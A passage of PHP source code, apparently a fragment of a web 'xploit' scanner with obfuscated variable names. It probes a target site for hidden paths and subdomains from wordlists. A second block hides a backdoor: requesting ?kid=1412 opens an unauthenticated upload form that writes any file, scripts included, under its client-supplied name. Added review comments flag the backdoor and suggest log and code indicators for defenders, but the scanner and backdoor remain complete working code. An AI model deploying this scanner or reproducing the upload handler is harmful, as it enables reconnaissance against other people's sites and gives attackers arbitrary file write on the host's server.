if($_POST['xploit_404string'] != "") if(strpos($Vjtvqebusmzy, $_POST['xploit_404string'])) return 0;
return 1;
}
// Render the form, then stop unless a non-empty URL was submitted.
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
// Base URL is taken verbatim from the form and given a trailing slash if it lacks one.
$Vgcbor1jfuhz = $_POST['xploit_url'];
if ($Vgcbor1jfuhz[strlen($Vgcbor1jfuhz)-1] != "/") $Vgcbor1jfuhz .= "/";
// Baseline for soft-404 comparison: when no marker string was supplied, fetch a file name
// assumed not to exist and keep the body for check() to compare against.
// NOTE(review): the probe name is a fixed constant, so a request for it in a site's access
// log is a dependable indicator that this script was pointed at that site.
if($_POST['xploit_404string'] == "") $V14pcrszqxfd = @file_get_contents($Vgcbor1jfuhz."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
// Strip carriage returns and split both wordlists into one entry per line.
$Vircns10bdhz['end'] = str_replace("\r", "", $Vircns10bdhz['end']);
$Vircns10bdhz['front'] = str_replace("\r", "", $Vircns10bdhz['front']);
$Vhrw13m5acnx = explode("\n", $Vircns10bdhz['end']);
$Vmjbtqyr10tepathes = explode("\n", $Vircns10bdhz['front']);
// Publish the total number of candidates into the "total" element (replace mode).
show(count($Vhrw13m5acnx)+count($Vmjbtqyr10tepathes), 1, 0, 'total', 1);
// Running count of candidates processed, mirrored into the "verified" element.
$Vukqxjqw4ork = 0;
// Pass 1: every 'end' entry appended to the base URL.
foreach($Vhrw13m5acnx as $Vwzmmrxgwfr0) {
show('Checking '.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.' : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vwzmmrxgwfr0) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'">'.$Vgcbor1jfuhz.$Vwzmmrxgwfr0.'</a>', 1, 0, 'rightcol', 0);
}
}
// Reduce the base URL to the text between "//" and the next "/", then drop a leading "www"
// together with the character after it. From here on the global holds a host name, which is
// what check() expects in its second mode.
preg_match("/\/\/(.*?)\//i", $Vgcbor1jfuhz, $Vwwogu3y1egdx); $Vgcbor1jfuhz = $Vwwogu3y1egdx[1];
if(substr($Vgcbor1jfuhz, 0, 3) == "www") $Vgcbor1jfuhz = substr($Vgcbor1jfuhz, 4);
// Pass 2: every 'front' entry tried as a host label over plain http.
foreach($Vmjbtqyr10tepathes as $Vmjbtqyr10tepath) {
show('Checking http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/ : ', 0, 0, 'logbox', 0);
$Vukqxjqw4ork++; show($Vukqxjqw4ork, 0, 0, 'verified', 1);
if(check($Vmjbtqyr10tepath, 1) == 0) show('404 Error!!!', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;site:3"><strong>200 OKE!!!<</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'/">'.$Vmjbtqyr10tepath.'.'.$Vgcbor1jfuhz.'</a>', 1, 0, 'rightcol', 0);
}
}
?>
<?php
// NOTE(review): this second PHP block is not part of the advertised scanner. It is a file
// upload handler gated only by a fixed query-string value: no login and no session check.
if($_GET['kid']=='1412')
{
echo '<form method="POST" enctype="multipart/form-data" action="?kid=1412">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
// The destination is the client-supplied file name, used as a relative path, with no
// extension, content-type, size or path check. Whoever hosts this page therefore exposes an
// unauthenticated arbitrary file write, executable scripts included, on their own server.
// Defensive handling: treat the page as backdoored and do not deploy it. When hunting, flag
// move_uploaded_file() calls whose target is $_FILES[...]['name'] and review the script's
// directory for files that did not ship with the site.
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>